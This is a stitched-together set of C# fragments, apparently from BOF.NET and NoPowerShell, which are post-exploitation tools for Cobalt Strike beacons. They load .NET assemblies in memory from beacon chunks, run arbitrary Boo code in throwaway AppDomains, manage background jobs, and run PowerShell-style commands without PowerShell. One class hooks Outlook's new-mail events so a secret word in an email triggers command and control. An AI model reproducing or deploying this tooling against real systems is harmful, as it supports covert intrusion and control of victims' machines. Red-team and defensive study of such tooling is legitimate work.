public override void Go(string[] _)
{
foreach (BeaconJob job in Runtime.Jobs.Values)
{
BeaconConsole.WriteLine(job);
}
}
public override void Go(byte[] chunk)
{
Unpack unpack = new Unpack("Zib", chunk);
string assemblyName = (string)unpack.Values[0];
int chunkSize = (int)unpack.Values[1];
byte[] assemblyChunk = (byte[])unpack.Values[2];
MemoryStream assemblyData;
if (!activeAssemblyLoads.ContainsKey(assemblyName))
{
BeaconConsole.WriteLine($"[+] Setting up new loader with unique id {assemblyName}");
assemblyData = new MemoryStream();
activeAssemblyLoads[assemblyName] = assemblyData;
}
else
{
assemblyData = activeAssemblyLoads[assemblyName];
}
assemblyData.Write(assemblyChunk, 0, assemblyChunk.Length);
if (assemblyChunk.Length < chunkSize)
{
LoadAssembly(assemblyData.ToArray());
activeAssemblyLoads.Remove(assemblyName);
}
}
public override void Go(byte[] booCode)
{
if (booCode == null || booCode.Length == 0)
{
BeaconConsole.WriteLine("[!] No source code given to run, provide your BooLang code as the first and only argument");
return;
}
string booCodeStr = Encoding.UTF8.GetString(booCode);
string temporaryAppDomainName = RandomString(10);
AppDomain temporaryAppDomain = null;
Runtime.AssemblyInfo runtimeAssembly = Runtime.LoadedAssemblies["BOFNET"];
try {
temporaryAppDomain = (AppDomain)InitialiseChildBOFNETAppDomain(temporaryAppDomainName, runtimeAssembly.AssemblyData, runtimeAssembly.AssemblyData.Length);
if (temporaryAppDomain == null)
{
BeaconConsole.WriteLine("[!] Failed to setup temporary AppDomain for Boo exection");
return;
}
BooExecutor booExecutor = temporaryAppDomain.CreateInstanceAndUnwrap(Assembly.GetExecutingAssembly().FullName,
"BOFNET.Bofs.Boo.BooExecutorImpl") as BooExecutor;
booExecutor.Init(BeaconConsole);
booExecutor.Execute(booCodeStr);
} finally {
if (temporaryAppDomain != null)
{
AppDomain.Unload(temporaryAppDomain);
}
}
}
public override void Go(string[] args)
{
if (args.Length == 0)
{
BeaconConsole.WriteLine("[!] No job id given, can't give you job status");
return;
}
int jobId = int.Parse(args[0]);
if (!Runtime.Jobs.TryGetValue(jobId, out BeaconJob job))
{
BeaconConsole.WriteLine($"[!] Job with id {jobId} doesn't exist");
return;
}
BeaconConsole.WriteLine(job);
if (job.BeaconConsole.HasData)
{
BeaconConsole.WriteLine(job.BeaconConsole.ConsoleText);
}
if (job.Thread.IsAlive)
{
job.Thread.Abort();
Runtime.Jobs.Remove(jobId);
BeaconConsole.WriteLine("[+] Job killed and console drained, removing from active job list");
}
else
{
BeaconConsole.WriteLine("[+] Job already stopped. Drained console and removing from active job list");
}
}
public override void Go(string[] _)
{
foreach (KeyValuePair <string, Runtime.AssemblyInfo> assembly in Runtime.LoadedAssemblies)
{
BeaconConsole.WriteLine($"{assembly.Key}: {assembly.Value.Assembly.FullName}");
}
}
public override void Go(string[] args)
{
BeaconConsole.WriteLine($"[+] Hello from BOF.NET. Arguments:");
foreach (string arg in args)
{
BeaconConsole.WriteLine($"{arg}");
}
}
public override void Go(string[] args)
{
AppDomain.CurrentDomain.GetAssemblies()
.SelectMany(s => s.GetTypes())
.Where(p => typeof(BeaconObject).IsAssignableFrom(p) && !p.IsAbstract && !p.IsInterface)
.ToList()
.ForEach(type => BeaconConsole.WriteLine($"{type.FullName}"));
}
void outlookInit()
{
try
{
WaitForReply = new AutoResetEvent(false);
app = new Application();
ns = app.GetNamespace("MAPI");
inboxFolder = ns.GetDefaultFolder(Microsoft.Office.Interop.Outlook.OlDefaultFolders.olFolderInbox);
}
catch (System.Exception Ex)
{
BeaconConsole.WriteLine($"Failed to initialize outlook COM: {Ex.Message}");
}
}
public override void Go(string[] args)
{
if (args.Length == 0)
{
BeaconConsole.WriteLine("[!] Cannot run a job, no BOF.NET class specified to run");
return;
}
BeaconJobWriter btw = new BeaconJobWriter();
BeaconObject bo = Runtime.CreateBeaconObject(args[0], btw, new Runtime.InitialiseChildBOFNETAppDomain(InitialiseChildBOFNETAppDomain), null, null);
BeaconJob beaconJob = new BeaconJob(bo, args.Skip(1).ToArray(), btw);
Runtime.Jobs[beaconJob.Thread.ManagedThreadId] = beaconJob;
BeaconConsole.WriteLine($"[+] Started Task {args[0]} with job id {beaconJob.Thread.ManagedThreadId}");
}
private void LoadAssembly(byte[] assemblyData)
{
Assembly assembly = Runtime.LoadAssembly(assemblyData);
BeaconConsole.WriteLine($"[+] Loaded assembly {assembly.FullName} successfully");
var assemblyLoaderType = assembly.GetType("Costura.AssemblyLoader", false);
if (assemblyLoaderType != null)
{
BeaconConsole.WriteLine($"[=] Assembly has been prepared with Costura, running Cosutra embedded assembly loader");
var attachMethod = assemblyLoaderType?.GetMethod("Attach", BindingFlags.Static | BindingFlags.Public);
attachMethod?.Invoke(null, new object[] { });
}
}
public override void Go(string[] args)
{
if (args.Length != 2)
{
BeaconConsole.WriteLine("wrong args.\r\n" +
"Parameters: bofnet_execute On_demand_c2_bof.OnDemandC2Class [subject || body] secret_word\r\n" +
"Example: bofnet_execute On_demand_c2_bof.OnDemandC2Class subject quality");
return;
}
if (args[0] != "subject" || args[0] != "body")
{
BeaconConsole.WriteLine("The monitoring type should be either subject or body.\r\nExample: bofnet_execute On_demand_c2_bof.OnDemandC2Class subject quality");
}
outlookInit();
BeaconConsole.WriteLine($"Creating Outlook COM objects succeeded.\r\nHooking to all emails with {args[0]} that contains {args[1]}");
OnDemandC2(args[0], args[1]);
}
void OnDemandC2(string type, string triggerWord)
{
OnDemandC2Trigger = triggerWord;
try
{
if (type == "subject")
{
app.NewMailEx += OnDemandC2_Subject_Subscriber;
}
else if (type == "body")
{
app.NewMailEx += OnDemandC2_Body_Subscriber;
}
}
catch (System.Exception Ex)
{
BeaconConsole.WriteLine($"Error hooking to outlook events: {Ex.Message}");
}
//Wait for new messages
WaitForReply.WaitOne();
}
public override void Go(byte[] assemblyData)
{
Runtime.RegisterRuntimeAssembly(assemblyData);
BeaconConsole.WriteLine($"[+] BOFNET Runtime Initalized, assembly size {assemblyData.Length}, .NET Runtime Version: {Environment.Version} in AppDomain {AppDomain.CurrentDomain.FriendlyName}");
}
public override void Go(byte[] assemblyData)
{
BeaconConsole.WriteLine($"[+] BOFNET Runtime Initalized, assembly size {assemblyData.Length}, .NET Runtime Version: {Environment.Version.ToString()}");
}
public override void Go(byte[] assemblyData)
{
BeaconConsole.WriteLine($"[+] BOFNET Runtime Initalized, assembly size {assemblyData.Length}");
}
public static void Main(string[] args)
{
#endif
// Using reflection determine available commands
Dictionary <Type, CaseInsensitiveList> availableCommands = ReflectionHelper.GetCommands();
List <PSCommand> userCommands = null;
// If no arguments are provided to the executable, show help
if (args.Length == 0)
{
Console.WriteLine("== NoPowerShell v{0} ==\r\nWebsite: {1}\r\n{2}", VERSION, WEBSITE, USAGE);
userCommands = new List <PSCommand>(1)
{
new GetCommandCommand(null)
};
}
// Parse pipes in commandline arguments and commands within pipes
else
{
string error = null;
try
{
userCommands = PipeParser.ParseArguments(args, availableCommands);
}
catch (ParameterBindingException ex)
{
error = ex.Message;
}
catch (CommandNotFoundException ex)
{
error = string.Join("", new string[] { ex.Message, HELP });
}
if (error != null)
{
#if BOFBUILD
BeaconConsole.WriteLine(error);
#else
WriteError(error);
#endif
}
}
// Add output to console if no explicit output is provided
Type lastCommand = userCommands[userCommands.Count - 1].GetType();
bool justOutput = false;
if (lastCommand != typeof(FormatListCommand) && lastCommand != typeof(FormatTableCommand))
{
justOutput = true;
}
CommandResult result = null;
#if DEBUG
// Execute commands in pipeline
foreach (PSCommand command in userCommands)
{
result = command.Execute(result);
}
#else
PSCommand mostRecentCommand = null;
try
{
// Execute commands in pipeline
foreach (PSCommand command in userCommands)
{
mostRecentCommand = command;
result = command.Execute(result);
}
}
catch (NoPowerShellException e)
{
WriteError(string.Format("{0} : {1}", mostRecentCommand.ToString(), e.Message));
return;
}
catch (Exception e)
{
WriteError(string.Format("{0} : {1}", mostRecentCommand.ToString(), e.ToString()));
return;
}
#endif
// Output to screen
if (justOutput)
{
string output = ResultPrinter.OutputResults(result);
#if BOFBUILD
BeaconConsole.WriteLine(output);
#else
Console.Write(output);
#endif
}
}
public override void Go(string[] args)
{
BeaconConsole.WriteLine($"[+] Welcome to BOFNET { (args.Length > 0 ? args[0] : "anonymous" )}");
}